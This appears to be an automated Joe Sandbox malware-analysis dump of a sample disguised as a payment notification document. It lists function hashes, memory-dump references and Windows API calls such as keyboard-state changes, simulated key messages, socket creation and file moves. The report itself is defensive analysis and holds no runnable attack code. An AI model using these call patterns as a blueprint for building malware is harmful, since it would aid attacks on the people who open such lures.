                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                              • String ID:
                                                                              • API String ID: 4072528602-0
                                                                              • Opcode ID: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
                                                                              • Instruction ID: 725a997a32b67e8eba5c6a776d15e4570c20916da2997f64ac42afb71c1df1ce
                                                                              • Opcode Fuzzy Hash: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
                                                                              • Instruction Fuzzy Hash: 6F71A076608244AFEB219FA4C994FFABBB9EF49300F148859F94D97261CB31A844DB10
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 0094AEF9
                                                                              • GetKeyboardState.USER32(?), ref: 0094AF0E
                                                                              • SetKeyboardState.USER32(?), ref: 0094AF6F
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0094AF9D
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0094AFBC
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 0094AFFD
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0094B020
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
                                                                              • Instruction ID: d07757cfeac22b0fc811e3cf66b86791d9fbde389e40de3eb3ce23e454b74637
                                                                              • Opcode Fuzzy Hash: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
                                                                              • Instruction Fuzzy Hash: 7F51CDA1A487D53DFB3682348C45FBBBEAD5B06304F088989E1E9958C2D3D8EDC8D751
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 0094AD19
                                                                              • GetKeyboardState.USER32(?), ref: 0094AD2E
                                                                              • SetKeyboardState.USER32(?), ref: 0094AD8F
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0094ADBB
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0094ADD8
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0094AE17
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0094AE38
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
                                                                              • Instruction ID: d024219403177082123ff83c33a2d030644adfa65a41f6c20de630db985a2b86
                                                                              • Opcode Fuzzy Hash: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
                                                                              • Instruction Fuzzy Hash: 8251D5A19887D53DFB3683348C95F7B7EAC5B46304F088588E1E9468C2D294ED88E752
                                                                              APIs
                                                                              • GetConsoleCP.KERNEL32(00923CD6,?,?,?,?,?,?,?,?,00915BA3,?,?,00923CD6,?,?), ref: 00915470
                                                                              • __fassign.LIBCMT ref: 009154EB
                                                                              • __fassign.LIBCMT ref: 00915506
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00923CD6,00000005,00000000,00000000), ref: 0091552C
                                                                              • WriteFile.KERNEL32(?,00923CD6,00000000,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 0091554B
                                                                              • WriteFile.KERNEL32(?,?,00000001,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 00915584
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1324828854-0
                                                                              • Opcode ID: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
                                                                              • Instruction ID: 805dbcdf876b633db3ea388f9044658cea219ca05e38425cfa1d15268a919754
                                                                              • Opcode Fuzzy Hash: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
                                                                              • Instruction Fuzzy Hash: 9E51E5B1B00609DFDB10CFA8D845AEEBBFAEF49300F16451AF555E7291D7309A81CB60
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00902D4B
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00902D53
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00902DE1
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00902E0C
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00902E61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
                                                                              • Instruction ID: 5771cdf44958b204bb4f42d5e2f491460c38b705d42ca641f3daa6f06187eee3
                                                                              • Opcode Fuzzy Hash: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
                                                                              • Instruction Fuzzy Hash: 4E418E34A00219EFCF10DF68C859A9EBBB9BF85324F148195E814AB3D2D775AE15CBD0
                                                                              APIs
                                                                                • Part of subcall function 0096304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0096307A
                                                                                • Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00961112
                                                                              • WSAGetLastError.WSOCK32 ref: 00961121
                                                                              • WSAGetLastError.WSOCK32 ref: 009611C9
                                                                              • closesocket.WSOCK32(00000000), ref: 009611F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 2675159561-0
                                                                              • Opcode ID: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
                                                                              • Instruction ID: a7b066bd64e21b7f1122ae5f88aac9d7257a4325b4da019b67993f67f5870a32
                                                                              • Opcode Fuzzy Hash: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
                                                                              • Instruction Fuzzy Hash: 2C41F672604204AFDB109F14C885BAAB7E9FF46364F198059FD19DB291CB74ED81CBE1
                                                                              APIs
                                                                                • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD
                                                                                • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0094CF45
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0094CF7F
                                                                              • _wcslen.LIBCMT ref: 0094D005
                                                                              • _wcslen.LIBCMT ref: 0094D01B
                                                                              • SHFileOperationW.SHELL32(?), ref: 0094D061
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 3164238972-1173974218
                                                                              • Opcode ID: e854d9abaf99c06454db10c6e1eaa6599cb6b79ca8275f86e3afd5daefc65ab2
                                                                              • Instruction ID: 9c398c78981813a57f42eba183ad320be532aeb42ac62ba7c53fe37a7faaf1fa
                                                                              • Opcode Fuzzy Hash: e854d9abaf99c06454db10c6e1eaa6599cb6b79ca8275f86e3afd5daefc65ab2
                                                                              • Instruction Fuzzy Hash: 484156B59462189FDF12EBA4C981FDEB7BCAF48380F1000E6E505EB141EB35A688CB50
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00972E1C
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00972E4F
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00972E84
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00972EB6
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00972EE0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00972EF1
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00972F0B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
                                                                              • Instruction ID: 54898307ef22e19d92aa02da98af61a2e3f0b04fcb5eb489d9dc67812c153cec
                                                                              • Opcode Fuzzy Hash: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
                                                                              • Instruction Fuzzy Hash: 69311532628141DFDB20CF58ED94F6937E4EF8A720F154168F9488F2B1CB71A880EB41
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947769
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094778F
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00947792
                                                                              • SysAllocString.OLEAUT32(?), ref: 009477B0
                                                                              • SysFreeString.OLEAUT32(?), ref: 009477B9
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 009477DE
                                                                              • SysAllocString.OLEAUT32(?), ref: 009477EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 05a908086cf029128371a2fc8d96dc341e7c45ba38b75ed3db420c7e751cb65a
                                                                              • Instruction ID: 86584bfb04b83875d53a37d7d5e082062876016e41d4c674b4ecf7fd5403304b
                                                                              • Opcode Fuzzy Hash: 05a908086cf029128371a2fc8d96dc341e7c45ba38b75ed3db420c7e751cb65a
                                                                              • Instruction Fuzzy Hash: 6421B07660821DAFDB10DFA8CC88CBBB7ACEF093647408429FA19DB161D770DC8187A0
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947842
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947868
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0094786B
                                                                              • SysAllocString.OLEAUT32 ref: 0094788C
                                                                              • SysFreeString.OLEAUT32 ref: 00947895
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 009478AF
                                                                              • SysAllocString.OLEAUT32(?), ref: 009478BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 2fb200c8f13e5563252e83189b463649127bcb7053df0b05783cf79bba2866ea
                                                                              • Instruction ID: 89e0f5dd3ad16cb584b5d7d43b807a3678449392ecc50f09806a2da169662aa4
                                                                              • Opcode Fuzzy Hash: 2fb200c8f13e5563252e83189b463649127bcb7053df0b05783cf79bba2866ea
                                                                              • Instruction Fuzzy Hash: D5213E76608208AF9B109BE8DC88DAAB7ACEB097607108525BA15DB2A1D774DC81DB64
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009504F2
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0095052E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandlePipe
                                                                              • String ID: nul
                                                                              • API String ID: 1424370930-2873401336
                                                                              • Opcode ID: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
                                                                              • Instruction ID: fa546b65b27ca7f59ec072c28b610b64ad5dc8cd98f058e25c0fe293b777f1c5
                                                                              • Opcode Fuzzy Hash: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
                                                                              • Instruction Fuzzy Hash: 85217E71500305EBDB20CF2BD804A9A77A8BF84725F204A19FCA1E62E0E770D949DF20
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 009505C6
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00950601
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandlePipe
                                                                              • String ID: nul
                                                                              • API String ID: 1424370930-2873401336
                                                                              • Opcode ID: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
                                                                              • Instruction ID: 12fc06fd3aa649fd2e1b97493e6bc3199f18af0d9f9ab64dc5746a697c5bc928
                                                                              • Opcode Fuzzy Hash: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
                                                                              • Instruction Fuzzy Hash: 92217F75501306DBDB20DF6ADC04A9A77A8AFD5721F240B19FCA1E72E0E77099A4CB10
                                                                              APIs
                                                                                • Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                                • Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
                                                                                • Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00974112
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0097411F
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0097412A
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00974139
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00974145
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
                                                                              • Instruction ID: 02d5693dd89e56fadc5c5c715c428b7bd036dbeb72ceff6d6c288b99f9d65e89
                                                                              • Opcode Fuzzy Hash: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
                                                                              • Instruction Fuzzy Hash: 1511B2B2150219BEEF119F64CC86EE77F9DEF19798F108110BA18A2050C7729C61DBA4
                                                                              APIs
                                                                                • Part of subcall function 0091D7A3: _free.LIBCMT ref: 0091D7CC
                                                                              • _free.LIBCMT ref: 0091D82D
                                                                                • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                                • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                              • _free.LIBCMT ref: 0091D838
                                                                              • _free.LIBCMT ref: 0091D843
                                                                              • _free.LIBCMT ref: 0091D897
                                                                              • _free.LIBCMT ref: 0091D8A2
                                                                              • _free.LIBCMT ref: 0091D8AD
                                                                              • _free.LIBCMT ref: 0091D8B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                              • Instruction ID: ab4facfb0111765fd200093cf298ee1fe1f7371c4c785adedc0ab37f9f34c76f
                                                                              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                              • Instruction Fuzzy Hash: 841151B1742B0CAAE521BFB0CC47FCB7BDC6F80710F440825B2A9AA0D2DAA5B5A54650
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0094DA74
                                                                              • LoadStringW.USER32(00000000), ref: 0094DA7B
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094DA91
                                                                              • LoadStringW.USER32(00000000), ref: 0094DA98
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094DADC
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0094DAB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 4072794657-3128320259
                                                                              • Opcode ID: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
                                                                              • Instruction ID: c536526b27fdda80524e64e7d168f72ad4419362845e3e0eb669d888de55c4f9
                                                                              • Opcode Fuzzy Hash: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
                                                                              • Instruction Fuzzy Hash: A70186F75142087FE711ABA09D89EEB376CE708705F4048A9B74AE2041EA749EC44F74
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(019A0CB0,019A0CB0), ref: 0095097B
                                                                              • EnterCriticalSection.KERNEL32(019A0C90,00000000), ref: 0095098D
